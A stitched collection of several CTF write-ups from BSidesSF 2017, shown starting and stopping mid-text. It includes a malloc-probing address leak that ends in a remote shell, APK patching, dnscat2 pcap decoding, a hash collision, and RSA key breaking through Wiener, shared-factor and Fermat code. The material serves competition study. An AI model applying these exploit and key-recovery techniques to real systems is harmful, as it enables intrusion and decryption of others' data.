0x7ffff73f0000 0xb000 0x0 /lib/x86_64-linux-gnu/libnss_nis-2.19.so 0x7ffff73f0000 0x7ffff75ef000 0x1ff000 0xb000 /lib/x86_64-linux-gnu/libnss_nis-2.19.so 0x7ffff75ef000 0x7ffff75f0000 0x1000 0xa000 /lib/x86_64-linux-gnu/libnss_nis-2.19.so 0x7ffff75f0000 0x7ffff75f1000 0x1000 0xb000 /lib/x86_64-linux-gnu/libnss_nis-2.19.so 0x7ffff75f1000 0x7ffff7608000 0x17000 0x0 /lib/x86_64-linux-gnu/libnsl-2.19.so 0x7ffff7608000 0x7ffff7807000 0x1ff000 0x17000 /lib/x86_64-linux-gnu/libnsl-2.19.so 0x7ffff7807000 0x7ffff7808000 0x1000 0x16000 /lib/x86_64-linux-gnu/libnsl-2.19.so 0x7ffff7808000 0x7ffff7809000 0x1000 0x17000 /lib/x86_64-linux-gnu/libnsl-2.19.so 0x7ffff7809000 0x7ffff780b000 0x2000 0x0 0x7ffff780b000 0x7ffff7814000 0x9000 0x0 /lib/x86_64-linux-gnu/libnss_compat-2.19.so 0x7ffff7814000 0x7ffff7a13000 0x1ff000 0x9000 /lib/x86_64-linux-gnu/libnss_compat-2.19.so 0x7ffff7a13000 0x7ffff7a14000 0x1000 0x8000 /lib/x86_64-linux-gnu/libnss_compat-2.19.so 0x7ffff7a14000 0x7ffff7a15000 0x1000 0x9000 /lib/x86_64-linux-gnu/libnss_compat-2.19.so 0x7ffff7a15000 0x7ffff7bcf000 0x1ba000 0x0 /lib/x86_64-linux-gnu/libc-2.19.so 0x7ffff7bcf000 0x7ffff7dcf000 0x200000 0x1ba000 /lib/x86_64-linux-gnu/libc-2.19.so 0x7ffff7dcf000 0x7ffff7dd3000 0x4000 0x1ba000 /lib/x86_64-linux-gnu/libc-2.19.so 0x7ffff7dd3000 0x7ffff7dd5000 0x2000 0x1be000 /lib/x86_64-linux-gnu/libc-2.19.so 0x7ffff7dd5000 0x7ffff7dda000 0x5000 0x0 0x7ffff7dda000 0x7ffff7dfd000 0x23000 0x0 /lib/x86_64-linux-gnu/ld-2.19.so 0x7ffff7fcf000 0x7ffff7fd2000 0x3000 0x0 0x7ffff7ff6000 0x7ffff7ff8000 0x2000 0x0 0x7ffff7ff8000 0x7ffff7ffa000 0x2000 0x0 [vvar] 0x7ffff7ffa000 0x7ffff7ffc000 0x2000 0x0 [vdso] 0x7ffff7ffc000 0x7ffff7ffd000 0x1000 0x22000 /lib/x86_64-linux-gnu/ld-2.19.so 0x7ffff7ffd000 0x7ffff7ffe000 0x1000 0x23000 /lib/x86_64-linux-gnu/ld-2.19.so 0x7ffff7ffe000 0x7ffff7fff000 0x1000 0x0 0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]``` Based on the above output, it looks like the shellcode is always located above everything else in memory and it is unlikely there is anything else in memory nearby. ### Initial Analysis Conclusions Based on the initial analysis, it appears the problem is to find the location of the shellcode in memory which is randomized each time the binary is run and jump to it using only malloc to leak information. ## Leaking Information ### Feedback The only way to leak information from the program is to use the information it gives as feedback over the socket. The most definitive and useful information it supplies is whether or not malloc succeeds. This is the attack vector I chose to leak the address of the shellcode. ### malloc malloc will fail if the program cannot allocate the space in memory that is requested. The only reason this would happen during normal operation of this program is if there is not a large enough continuous space in memory to meet the request. This means it would be possible to leak the largest continuous space in memory by attempting to allocate an area in memory that the program cannot possibly create and then slowing lowering the size of the allocation until it succeeds. ### Large Allocations The problem is the largest continuous space in memory is about 2^48 bytes in size, or ~300 terabytes. The operating system can't possibly let us allocate something this large, and a local test confirms this. ```[a]lloc, [j]ump : asz? 8589934592FAIL[a]lloc, [j]ump : asz? 4294967296free? ``` In the above session we can see 8589934592 (2^33) fails while 4294967296 (2^32) succeeds. Somewhere between those two numbers is the amount of RAM on my machine, so clearly the operating system is rejecting an allocation so large that the system cannot possibly use it. However, testing on the remote server shows something interesting. ```[a]lloc, [j]ump : asz? 281474976710656free? ``` Somehow TB allocations are allowed remotely but not on my machine. Unless they secured all the RAM in the world, there must be some way to tell the operating system not to reject allocations greater than the total amount of memory available. ### Memory Overcommitment After some searching, I found the setting they must have used on their server to allow for larger allocations, overcommit_memory. The default setting of 0 will do some basic checking on the size of allocations, but setting the value to 1 will not do any checking, which is what we want. ```# echo 1 > /proc/sys/vm/overcommit_memory``` After changing this setting, allocations as large as 2^48 work locally just like on the remote server. This means developing a solution locally is possible ## Developing a Solution ### Strategy Looking back at the map of memory from GDB, there are effectively three large open spaces in memory. ```Mapped address spaces: Start Addr End Addr Size Offset objfile 0x2fa5a2820000 0x2fa5a2821000 0x1000 0x0 /home/.../poop.sc 0x555555554000 0x555555556000 0x2000 0x0 /home/.../hiddensc ... 0x555555758000 0x555555779000 0x21000 0x0 [heap] 0x7ffff71da000 0x7ffff71e4000 0xa000 0x0 /lib/x86_64-linux-gnu/libnss_files-2.19.so ...``` From 0x0 to 0x555555555555 is somewhere between 2^46 and 2^47 bytes, and 0x555555779000 to 0x7ffff71da000 is somewhere between 2^46 and 2^45 bytes. The shellcode can be mapped to anywhere inside the first empty space which will split it into two parts. Let's see what happens if we create an allocation of size 2^32. ```gdb-peda$ info proc mappingsprocess 1116Mapped address spaces: Start Addr End Addr Size Offset objfile 0x4d4c10bd000 0x4d4c10be000 0x1000 0x0 /home/.../poop.sc 0x555555554000 0x555555556000 0x2000 0x0 /home/.../hiddensc 0x555555756000 0x555555757000 0x1000 0x2000 /home/.../hiddensc 0x555555757000 0x555555758000 0x1000 0x3000 /home/.../hiddensc 0x555555758000 0x555555779000 0x21000 0x0 [heap] --->0x7ffeeffff000 0x7ffff0000000 0x100001000 0x0 0x7ffff0000000 0x7ffff0021000 0x21000 0x0 0x7ffff0021000 0x7ffff4000000 0x3fdf000 0x0 0x7ffff71da000 0x7ffff71e4000 0xa000 0x0 /lib/x86_64-linux-gnu/libnss_files-2.19.so ...``` It looks like malloc put the allocated memory at the bottom of memory, just above some of the libraries. Unfortunately this doesn't help with figuring out where the shellcode page is, but creating an allocation of size 2^45 bytes will fill up most of that space. This means allocations in the range 2^45 to 2^47 should be populated in the area around the shellcode page after the lower free space is taken up. ```gdb-peda$ info proc mappingsprocess 4000Mapped address spaces: Start Addr End Addr Size Offset objfile 0x2e2a14308000 0x4e2a14309000 0x200000001000 0x0 0x4e2a14309000 0x4e2a1430a000 0x1000 0x0 /home/.../poop.sc ... 0x555555757000 0x555555758000 0x1000 0x3000 /home/.../hiddensc 0x555555758000 0x555555779000 0x21000 0x0 [heap] 0x5ffff71d9000 0x7ffff71da000 0x200000001000 0x0 0x7ffff71da000 0x7ffff71e4000 0xa000 0x0 /lib/x86_64-linux-gnu/libnss_files-2.19.so ...``` ### Solution So we can force the program to create allocations between 0x0 and the shellcode (which is the biggest space in memory), and we can see whether or not the allocations succeed (and free them if they do). This allows us to figure out the amount of space between 0x0 and the shellcode, which is effectively the address of the shellcode. From here it's just a binary search to find the maximum size allocation allowed. ### 50% of the Time it Works Every Time The only problem with the above strategy is sometimes (half the time) the shellcode is placed closer to 0x0 than the code section in memory. This means the biggest space (and the space the above binary search will find) will be between the code section and the shellcode. Unfortunately because of ASLR the code section moves around, so knowing the space between the code section and the shellcode won't help much. Looking back on this problem, the solution would have been to not free the biggest allocation we could make (effectively taking up all the space between the code section and the shellcode), and then doing another binary search. However during the competition I instead chose to wait 20 minutes for the server to place the shellcode at a new location which was hopefully closer to the code section than to 0x0. ## Testing the Solution ### Implementation ```hiddensc.py``` contains the code used to solve the problem. After some initial testing, the maximum size found by the binary search algorithm was consistently 16 or 17 pages smaller than the location of the shellcode. With this adjustment, it works after both possibilities are tried. This is not a problem because the server only randomizes the shellcode location every 20 minutes. Both possibilities can be tried without having to recalculate the address of the shellcode. ## Flag Connecting to the remote server and exploiting the binary gives a shell! ```$ lsflaghiddenscpoop.sc$ cat flagbkp{really who actually turns on overcommit even in prod...}```
#!/usr/bin/env python2import math from pwn import * """Read this: https://inst.eecs.berkeley.edu/~cs191/fa07/lectures/lecture22_fa07.pdf I don't really know much about quantum computers.Credit goes to [bobert](https://github.com/rstrand2357) for figuring out how to solve this.I took a page of notes during a phone call with him.I bit twiddle much better than he does. I also put some fmt.Println debug statements in the provided go code The challenge creates a list of possible bombs. You have to tell the programwhich bombs will explode and which won't, but if you actively observe an active bomb, it'll explode. Apparently there is some quantum magic where if you have a chain ofHadamard - phase shift - Hadamard - possible bomb[n]blocks, you can figure out if they are active bombs or not if youdo enough of these with a small enough phase shift each time. We do a total of 2000 (bignum) sets of those four blocks.Each phase shift is pi/bignum radians So, for each bomb n:send (2000*4) for the number of gatessend a Hadamard gatesend a phase shift by pi/2000send a Hadamard gatesend the index of the possible bomb nget the return value (0:safe, 1:bomb) Repeat for all 112 bombs Send back the list of bombs / not-bombs""" context.endian = "big"context.log_level = "INFO" # How many Hadamard-phase-Hadamard-bomb blocksbignum = 2000 # Gate types numbers are 0x70 + the gate indexhadamard = p8(0x70 + 4)# Phase rotation is a 64-bit floatphase_rot = p8(0x70 + 6) + struct.pack("
|Challenge ||------------||It's the developer's first mobile application.hey are trying their hand at storing secrets securely. Could one of them be the flag? (150 pts)| |file||-------------||[pinstore.apk](https://github.com/youben11/BSides-San-Francisco-CTF-2017/blob/master/pinstore.apk)| We start by : unzip pinstore.apk then convert the classes.dex file to jar by using : d2j-dex2jar classes.dexwe have now to extract the jar file and decompile all class file using javadecompiler we can start by reading MainActivity.java : we have to enter a pin which will be compared to the pin provided by DatabaseUtilities.fetchpin(), so we read the DatabaseUtilities.java and find this interesting line : Cusror cursor = db.rawQuery("SELECT pin FROM pinDB" , null); we search for a database file and find assets/pinlock.db [youben@youben assets]$ sqlite3 pinlock.db SQLite version 3.14.2 2016-09-12 18:50:49 Enter ".help" for usage hints. sqlite> SELECT pin FROM pinDB; d8531a519b3d4dfebece0259f90b466a23efc57b we can easily find the pin by searching on google 7498 we can also read assets/README: v1.0:- Pin database with hashed pins v1.1:- Added AES support for secret v1.2:- Derive key from pin[To-do: switch to the new database] So now we know that we have to switch to the new db after reading SecretDisplay.java and CryptoUtilities.java we know that the app is reading a secret from the databases andusing an algorithm to decrypt it, but we have two secret and two algorithm and all what we need to do is switching to the second secret and algorithm. we convert the classes.dex to a smali to patches it [youben@youben pinstore]$ baksmali classes.dex we modify SecretDisplay.smali : const-string v7, "v1" --> const-string v7, "v2" // (line 74) to switch to the second algorithm and modify the DatabaseUtilities.smali : const-string v1, "SELECT entry FROM secretsDBv1" --> const-string v1, "SELECT entry FROM secretsDBv2" //(line 315) to switch to the second table and get the second secret we can now rebuild the app : [youben@youben pinstore]$ smali out/ -o classes.dex [youben@youben patches]$ ls AndroidManifest.xml assets classes.dex res resources.arsc // (the new classes.dex) [youben@youben patches]$ jar -cvf myapp.apk *//(use you keystore to sign the jar) [youben@youben patches]$ adb install myapp.apk [100%] /data/local/tmp/myapp.apk pkg: /data/local/tmp/myapp.apk Success run the app, enter the pin ... you can see the flag.
# BsidesSF 2017 - Dnscap (forensics, 500 pts) >Found this packet capture. Pretty sure there's a flag in here. Can you find it!? >[dnscap.pcap](dnscap.pcap) We get a packet capture containing DNS traffic. Only queries and replies for A, MX and TXT records. We thought about an exchange over a DNS tunnel but didn't really know where to start. We simply started by decoding the hostnames in the DNS queries and see what it looked like: ```pythonfrom scapy.all import rdpcap, DNSQR, DNSRR for p in rdpcap('dnscap.pcap'): # Look at queries only if p.haslayer(DNSQR) and not p.haslayer(DNSRR): qry = p[DNSQR].qname.replace('.skullseclabs.org.', '').split('.') qry = ''.join(_.decode('hex') for _ in qry) print '%r' % qry``` The data in the hostnames towards the end contained this: '\xa0W\x00\xe6\xda\x83Q\x00\x01console (sirvimes)\x00' '\xb5A\x01\xe6\xda\x83Qn\xa2' '1s\x01\xe6\xda\x83Qn\xa2' '\xac\xe3\x01\xe6\xda\x83Qn\xa2Good luck! That was dnscat2 traffic on a flaky connection with lots of re-transmits. Seriously, ' 'd[\x01\xe6\xda\x83\xb1n\xa2good luck. :)\n' '3z\x01\xe6\xda\x83\xbfn\xa2' 'T[\x01\xe6\xda\x83\xbfn\xa2' From the message above we deducted that we were probably looking at the right place, and the first 9 bytes of each request was probably some dnscat specific data, useless for us. So we ran the script again, skipping the first 9 bytes and could observe the following: ![](https://i.imgur.com/qfAckUa.png) We can clearly recognise the signature for a PNG file being transmitted! We adapted our script to skip the first 9 bytes of each decoded hostname in the queries, and take only the lines between this PNG file header and the one that contained the 'IEND' chunk: ```python if 15 < qry_nb < 194: out += qry[9:] qry_nb += 1 open('out.png', 'wb').write(out)``` At this point, the file was ineligible. After mucking around trying to fix it, we remembered the phrase that we saw before: *"That was dnscat2 traffic on a flaky connection with lots of re-transmits."* That would mean that a lot of queries were actually the same as the previous ones? Let's try and fix the script. We also need to remove another 9 bytes of garbage in the first query that contains the PNG header. Finally our [script](solution.py) below solved it! ```pythonfrom scapy.all import rdpcap, DNSQR, DNSRR last_qry = ''out = ''q_nb = 0 for p in rdpcap('dnscap.pcap'): if p.haslayer(DNSQR) and not p.haslayer(DNSRR): qry = p[DNSQR].qname.replace('.skullseclabs.org.', '').split('.') qry = ''.join(_.decode('hex') for _ in qry)[9:] if qry == last_qry: continue last_qry = qry q_nb += 1 if q_nb == 7: # packet with PNG header out += qry[8:] if 7 < q_nb < 127: # All packets up to IEND chunk out += qry open('flag.png', 'wb').write(out)```Running it yields a valid PNG: ![](flag.png?raw=true)
We were given a silly web page with an arithmetic operation and a submit box. However, we should answer it *Fast and Furious*, so no time to manually do the math. I first tried using python *requests* but I changed my mind when I realized I would need one request to get the operation and then another to answer it. But by the time I sent the response to the first request, the operation would have changed. I needed something more interactive, like a Javascript code. Fortunately I had heard of [Selenium project](http://www.seleniumhq.org/docs/01_introducing_selenium.jsp) a tool for web browser automation, normally used for testing purposes. Therefore I moved on to Selenium webdriver, so I could use it within my python script (I really enjoy Python. Like, REALLY). This was a cool experience, since I wanted to try this tool for a long time. The results are amazing, it allows us to interact with the browser just as if we were pointing and clicking it. This should do the trick for now. After running pip install selenium , I got some errors since it was not finding the browser drivers (chrome driver in this case). Instead of exporting the dirver path to PATH env variable, I chose to download the package manually and hardcode it. In order to get the operands I used an XPath query. Although it is a very simple query, I used *Firebug's* "copy xpath" feature (just click with the right button over the desired element and click the xpath option). The eval() function (**!!DANGER!!**) was very useful too to evaluate a math expression from the retrieved string. After simulating the 'enter' key, it started running. Like really running, a browser was opened and things started happening there, as if I was clicking stuff myself. I got inebriated, no black screen, no green charachters. So futuristic. After about 200 levels we got the answer. the_flag_is_6ffb242e3f65a2b51c36745b1cd591d1
# slow (cloud 450) > Maybe if you run this on a big enough, strong enough computer for long enough,> you'll get it to print the flag! > The NSA might have a computer suitable for this :) This task, although it was in the `cloud` category, was more of an reverse engineering one. The main function was very simple, just `printf("FLAG{%lu}\n", real_main());`. So we had to find out what that functionreturns. Note that we couldn't simply run the binary - it throws `std::bad_alloc` immediately. Reverse engineering of the biggest function of the binary shows it is very sequential and repetitive code.First, it allocates two vectors of complex numbers - their size was 1LL<<48 though, far too much too allocate,let alone initialize. After initialization (0+0i everywhere, and 1+0i in the very first cell), there was a couple of calls to a certain function -I called it `split`. It took one parameter, and what it did was adding, subtracting, and multiplying some numbers in the vector. After reading some quantum mechanics articles (and solving the other quantum challenge), I believe it applied Hadamard gate to the system - not that it was important to the solution... One thing I noticed after reimplementation of the function in C++, is that the number of non-zero cells doubles after each call to `split`. This property will beimportant later on. After around 20 or so `split`s, the only remaining repeating patterns were of one of two types: `swap`,taking two arguments (say `a` and `b`), and swapping each index of array with `a`th bit set, with its corresponding cell,with bit `b` flipped. I believe this is controlled swap gate. The other repeating function was `rotate`, which multiplied each cell with certain bit set by (0+1i), or simply shifted phaseby 90 degrees. Finally, the code calculated a kind of checksum of the vector and returned the result to be printed as flag. Unfortunately, some of the calls to the functions I mentioned were inlined, which made it much more difficult to see whatis going on. In the end, I wrote a dirty Python script to scrape the called functions, with heuristics to find the inlinedones too (and their parameters). Still, we had to somehow run the code. I remind that there was a huge vector with 1LL<<48 cells. However, we can noticeboth `swap` and `rotate` do not change the number of non-zero cells: the `swap` just swaps them, and `rotate` multiplies.That means after all 22 of the `split`s, we had only 1<<22 non-zero cells - the vector was extremely sparse. For this reason,we did not have to waste computing power to iterate over all the cells - just the ones that had effect on the state (thenon-zero ones). We implemented it in C++ using `unordered_map`s, being careful to remove cells with zero in them aftereach transformation - otherwise, the whole map would quickly fill up and slow down. See `map.cpp` for the source code. Running it took around 10-15 minutes, and printed the correct flag.
# sponge (crypto, 200) > I've written a hash function. Come up with a string that collides with "I love> using sponges for crypto". The hash function we were given in this task, was simply xoring the 16-byte state with 10-byte input block, and thenencrypting with AES. If the blocks were 16-byte, the collision would be trivial to find, as we know the AES key:```result = state2 = AES(block1 xor AES(block0 xor state0)) = AES(block1 xor AES(block0))AESd(result) = block1 xor AES(block0)block1 = AESd(result) xor AES(block0)```So, we would be able to choose any `block0` other than original, and xor it with AES-decrypted final state to get neededblock1 for collision. Unfortunately, the blocks were 10-byte long, which meant we did not control the top 6 bytes supplied to the AES.While the attack above would still work in some cases, we would have to calculate approximately `2**48` AES en- or decryptions.This is not unreasonable, but we would probably run out of time during the CTF anyway. So, we wrote the stateof the hash after three blocks: (`a`, `b` and `c` are first three blocks, `D` is the final state)```AES(AES(a) xor b) xor c = DAES(AES(a) xor b) = D xor c AES(a) xor b = AESd( D xor c ) b = AESd( D xor c ) xor AES(a)```So the middle block is a xor of two pseudorandom values. We control most of `a` and `c`, so we can generate a lot of valuesof `AESd(D xor c)` and `AES(a)`. If they somehow end up with the same last 6 bytes, their xor with have 6 zeroes at theend, so we will find colliding `b`. Naive random generation of `c` and `a` would still take too long (no speed improvement in fact), but we can use *meet in the middle* technique. We precalculate `2**24` values of `AESd(D xor c)` and remember them in an efficientdata structure, such as hashmap, and then proceed to randomly genrating `AES(a)`, checking for each value (in constant time!)if there is any corresponding element in the map that ends with the same 6 bytes. This takes reasonable amount of time(although implemented in Python, only around a minute or so). Finally, we paste together `a`, `b`, `c` and `'o'` (the lastcharacter of the original text) to get a final collision to submit.
# RSA Buffet (crypto) ###ENG[PL](#pl-version) In the task we get a set of 10 4096 bit RSA public keys and 5 ciphertexts processed with some `secretsharing` python module.The goal is to break the public keys and decode ciphertexts.Sadly we got only 5 of the keys, and only 4 of the encrypted the ciphertexts so we got only the first flag (there were two). The first key we broke was the most obvious one, key number 3: ```e = 228667357288918039245378693853585657521675864952652022596906774862933762099300789254749604425410946822615083373857144528433260602296227303503891476899519658402024054958055003935382417495158976039669297102085384069060239103495133686397751308534862740272246002793830176686556622100583797028989159199545629609021240950860918369384255679720982737996963877876422696229673990362117541638946439467137750365479594663480748942805548680674029992842755607231111749435902398183446860414264511210472086370327093252168733191324465379223167108867795127182838092986436559312004954839317032041477453391803727162991479936070518984824373880381139279500094875244634092093215146125326800209962084766610206048422344237134106891516381979347888453395909395872511361844386280383251556028219600028715738105327585286564058975370316649206938752448895524147428799966328319661372247669163998623995646371176483786757036960204837994662752770358964913870689131473714797550537422931003343433377469029232185552979648755665051117443571002017829146470221483652014417043043920340602378994630507647460734411326405049128160906832664174206633659153486878241903912874200129515570971220983561054906106575556061388168231915057339795246395626504771079756241685975773086049021119L n = 625370676793301609007636145380331611237919351425496690404114180302249419719867435237342547950459491394834137179033102621573611784738388518952362848787237787440594300323769334356435131992521522997795029079251912507591819194229112877831181987001350385569134107880067429777572352378951587000987749447829255561035861423897841083194636994924140527822677164175006590642236546332030533920247393734145161727026178314748349757632676858997648848951518713836001935694487214337663667186794458714595706552931844195313593265852623091839910783970211228963728395962479544383117833611165858148867888664339695901377282163112482988096747232893295750676690941568494463290730116247822838421828649339437010788165430710512903632914670529270528098439859718986580569781164710102583602429563649626238817198851752150256839194761250249327990903746851390967504209752042479527523791824857674302720147951681393130861129469956962513163744166621211214770096232423058352324863327706013479610785632814580681502127018494520155709115651059545236646813027941576086510607434365502848385373510684649855795155224752033959337914546058251330474025320961186763814554194220596151399428277009154211720727770696506865214610059620204055226083684833160528072571967096188932684068843L``` It was obvious because with such high `e` we can run Wiener attack and recover the private key: ```sagec_fracs = continued_fraction(e/n).convergents()test_message = 42test_message_encrypted = pow(test_message,e,n)d = 0for i in xrange(len(c_fracs)): if pow(test_message_encrypted,c_fracs[i].denom(),n) == test_message: d = c_fracs[i].denom() breakprint(d)``` The next key we got was directly from factordb: http://factordb.com/index.php?query=549100898763808112064590568096509639806005267015788479836998648112330729762142760306265813195181231930171220686827142359040315653020182064933039077953579528749272321744478656324986362155106653831095037724728643255316641716947998245610175805278242802144980117927688674393383290354985820646326870614197414534217177211618710501438340081867982883181358830449072661742417246835970022211465130756382481343160426921258769780282358703413114522476037306476452786236456339806564839822630841425055758411765631749632457527073092742671445828538125416154242015006557099276782924659662805070769995499831691512789480191593818008294274869515824359702140052678892212293539574359134092465336347101950176544334845468112561615253963771393076343090247719105323352711194948081670662350809687853687199699436636944300210595489981211181100443706510898137733979941302306471697516217631493070094434891637922047009630278889176140288479340611479190580909389486067761958499091506601085734094801729179308537628951345012578144960250844126260353636619225347430788141190654302935255862518781845236444151680147886477815759103864509989480675169631226254252762579781553994364555800120817100328166428687776427164098803076677481602221304265962340500651339469391627432175447 This instantly gives us `p` and `q`. Another two keys gets broken with `common factor` approach - two modulus share the same prime so by calculating `gcd(n1,n2)` for each moduli pair we can get the common factor. ```pythonfor n1 in moduli: for n2 in moduli: p = gcd(n1,n2) if n1!=n2 and p!=1: print(n1,n2,p)``` The last key we got was from Fermat Fatorization - the primes `p` and `q` were both very close to `sqrt(n)`: ```pythondef fermat_factors(n): assert n % 2 != 0 a = gmpy2.isqrt(n) b2 = gmpy2.square(a) - n while not gmpy2.is_square(b2): a += 1 b2 = gmpy2.square(a) - n factor1 = a + gmpy2.isqrt(b2) factor2 = a - gmpy2.isqrt(b2) print(n, factor1, factor2) return int(factor1), int(factor2)``` Now with those recovered private keys we can proceed with decrypting the ciphertexts: ```pythondef decrypt(private_key, ciphertext): """Decrypt a message with a given private key. Takes in a private_key generated by Crypto.PublicKey.RSA, which must be of size exactly 4096 If the ciphertext is invalid, return None """ if len(ciphertext) < 512 + 16: return None msg_header = ciphertext[:512] msg_iv = ciphertext[512:512 + 16] msg_body = ciphertext[512 + 16:] try: symmetric_key = PKCS1_OAEP.new(private_key).decrypt(msg_header) except ValueError as e: print(e) return None if len(symmetric_key) != 32: return None return AES.new(symmetric_key, mode=AES.MODE_CFB, IV=msg_iv).decrypt(msg_body) def get_d(n, p, e): from crypto_commons.rsa.rsa_commons import modinv, get_fi_distinct_primes phi = get_fi_distinct_primes([p, n / p]) return modinv(e, phi) def decode_i(d, e, n, i): private_key = RSA.construct((n, e, d)) with codecs.open("ct/ciphertext-" + str(i) + ".bin") as ct_file: data = ct_file.read() decrypted = decrypt(private_key, data) print(decrypted)``` From this we get list of messages for secretsharing: ```pythondef recover_flag(msgs): print(PlaintextToHexSecretSharer.recover_secret(msgs)) def print_results(): msgs = [ '1-32a1cd9f414f14cff6685879444acbe41e5dba6574a072cace6e8d0eb338ad64910897369b7589e6a408c861c8e708f60fbbbe91953d4a73bcf1df11e1ecaa2885bed1e5a772bfed42d776a9', '1-e0c113fa1ebea9318dd413bf28308707fd660a5d1417fbc7da72416c8baaa5bf628f11c660dcee518134353e6ff8d37c', '1-1b8b6c4e3145a96b1b0031f63521c8df58713c4d6d737039b0f1c0750e16e1579340cfc5dadef4e96d6b95ecf89f52b8136ae657c9c32e96bf4384e18bd8190546ff5102cd006be5e1580053', '1-c332b8b93a914532a2dab045ea52b86d4d3950a990b5fc5e041dce9be1fd3912f9978cad009320e18f4383ca71d9d79114c9816b5f950305a6dd19c9f458695d52', '3-17e568ddc3ed3e6fe330ca47a2b27a2707edd0e0839df59fe9114fe6c08c6fc1ac1c3c8d9ab3cf7860dac103dff464d4c215e197b54f0cb46993912c3d0220a3eb1b80adf33ee2cc59b0372c', '3-b69efb4f9c5205175a4c9afb9d3c7bef728d9fb6c9cc1241411b31d4bd18744660391a330cefa8a86af8d2b80c881cfa', '3-572e70c5acfbe8b4c2cbd47217477d217da88c256ff2586af6a18391972c258bbea6143e7cd2ff6d39393efeb64d51d9318a2c337e50e2d764a42173bc3a1d5c7c8f24b64043daf5d2a8e9f4', '3-e9e6850880eb0a44d36fe9f2e5a458c6da3977b7fcd285afa27e9bfc116b1408570991504116b81864b03a7060bfd5d3fb6e007bb346f276d749befd545d1489c4', '4-4a87367d053c533fd995032ed1e651487cb5dc1e0b1cb70a7662b152c73650f039a60f391a52f2413f43bd54eb7b12c41b42f31ac557edd4bfe46a396a8cdbe19dc9d8121924f43be51c976d', '4-abbbcee71f140198ff8c50f51069465075979c31d32b052e7ae82ec7f6783aef7b41a597f9504d3340967b8d70cbe5a3', '4-35fbbe40058e20463547b363d1f164c0bbbb97cfd9ffe7619bce31a59392f0e9625a2cd035276e09c4df3c0932f22bd322f16e375c7c7fd88da0f972832707eb549ff1e776db37649019ebce', '4-12b466934911986bda845d8d26710a12250d210546f46716c78d7a17b1f2c893b95b934c8c7beafcf81a3123eb2ea05ca89101b23349e455794a8d56608c8ee49dd', '5-7d29041c468b680fcff93c16011a2869f17de75b929b787503b412becde0321ec72fe1e499f2150a1dacb9a5f701c0b37470049dd560cef5163543469817971f50782f763f0b05ab7088f7ae', '5-a7a1e271cf263279cece532b540545fa539b0f3650e2929163b02ee5459debdc53c1e07149eb2153015bb5c88e6270e8', '5-149480c5c75cbe320564adfa432ac8ea241e048ed39c8bc6be14ca80c392487f43a7882075d785d62cb314ea6c89a6b5f28adfa56ec481e124567b88241de2a6cabcc7ec9de3acac8be5375b', '5-7285289084282d559573f68eef10191091d76d6670014202670651f867cd2bc8640a86eef1c1e482affc7ae801fa446956c2186972fb6b7bac88c91d050c9d3cca' ] recover_flag(msgs[::4]) recover_flag(msgs[1::4]) recover_flag(msgs[2::4]) recover_flag(msgs[3::4]) recover_flag(msgs[4::4])``` And from this code we get: ```And another one's down, and another one's down, and another one bites the dust! Three's the magic number! FLAG{ndQzjRpnSP60NgWET6jX} Pssst--- can you keep a secret? If you get all five plaintexts, there's another flag :) 1./2J6|M{g!;L oJx''`z.uOzEM )g1'-:tUx%<HE7jWoi 9#q_ZUq_:+u9?]]y/*|5ch>Ee!mGj*MAnd another one's down, and another one's down, and another one bites the dust!``` So sadly only 4 out of 5 plaintexts and only one flag `FLAG{ndQzjRpnSP60NgWET6jX}` ###PL version W zadaniu dostajemy 10 4096 bitowych kluczy publicznych RSA oraz 5 szyfrogramów przetworzonych dodatkowo przez specjalną bibliotekę `secretsharing`.Celem jest złamanie kluczy publicznych i odzyskanie wiadomości.Niestety udało nam się złamać tylko 5 kluczy i odszyfrować 4 teksty, więc zdobyliśmy tylko jedną flagę (były dwie).Pierwszy złamany klucz był najbardziej oczywisty: ```e = 228667357288918039245378693853585657521675864952652022596906774862933762099300789254749604425410946822615083373857144528433260602296227303503891476899519658402024054958055003935382417495158976039669297102085384069060239103495133686397751308534862740272246002793830176686556622100583797028989159199545629609021240950860918369384255679720982737996963877876422696229673990362117541638946439467137750365479594663480748942805548680674029992842755607231111749435902398183446860414264511210472086370327093252168733191324465379223167108867795127182838092986436559312004954839317032041477453391803727162991479936070518984824373880381139279500094875244634092093215146125326800209962084766610206048422344237134106891516381979347888453395909395872511361844386280383251556028219600028715738105327585286564058975370316649206938752448895524147428799966328319661372247669163998623995646371176483786757036960204837994662752770358964913870689131473714797550537422931003343433377469029232185552979648755665051117443571002017829146470221483652014417043043920340602378994630507647460734411326405049128160906832664174206633659153486878241903912874200129515570971220983561054906106575556061388168231915057339795246395626504771079756241685975773086049021119L n = 625370676793301609007636145380331611237919351425496690404114180302249419719867435237342547950459491394834137179033102621573611784738388518952362848787237787440594300323769334356435131992521522997795029079251912507591819194229112877831181987001350385569134107880067429777572352378951587000987749447829255561035861423897841083194636994924140527822677164175006590642236546332030533920247393734145161727026178314748349757632676858997648848951518713836001935694487214337663667186794458714595706552931844195313593265852623091839910783970211228963728395962479544383117833611165858148867888664339695901377282163112482988096747232893295750676690941568494463290730116247822838421828649339437010788165430710512903632914670529270528098439859718986580569781164710102583602429563649626238817198851752150256839194761250249327990903746851390967504209752042479527523791824857674302720147951681393130861129469956962513163744166621211214770096232423058352324863327706013479610785632814580681502127018494520155709115651059545236646813027941576086510607434365502848385373510684649855795155224752033959337914546058251330474025320961186763814554194220596151399428277009154211720727770696506865214610059620204055226083684833160528072571967096188932684068843L``` Przy tak dużym `e` jasnym było, ze można użyć ataku Wienera: ```sagec_fracs = continued_fraction(e/n).convergents()test_message = 42test_message_encrypted = pow(test_message,e,n)d = 0for i in xrange(len(c_fracs)): if pow(test_message_encrypted,c_fracs[i].denom(),n) == test_message: d = c_fracs[i].denom() breakprint(d)``` Kolejny klucz dostajemy bezpośrednio z factordb: http://factordb.com/index.php?query=5491008987638081120645905680965096398060052670157884798369986481123307297621427603062658131951812319301712206868271423590403156530201820649330390779535795287492723217444786563249863621551066538310950377247286432553166417169479982456101758052782428021449801179276886743933832903549858206463268706141974145342171772116187105014383400818679828831813588304490726617424172468359700222114651307563824813431604269212587697802823587034131145224760373064764527862364563398065648398226308414250557584117656317496324575270730927426714458285381254161542420150065570992767829246596628050707699954998316915127894801915938180082942748695158243597021400526788922122935395743591340924653363471019501765443348454681125616152539637713930763430902477191053233527111949480816706623508096878536871996994366369443002105954899812111811004437065108981377339799413023064716975162176314930700944348916379220470096302788891761402884793406114791905809093894860677619584990915066010857340948017291793085376289513450125781449602508441262603536366192253474307881411906543029352558625187818452364441516801478864778157591038645099894806751696312262542527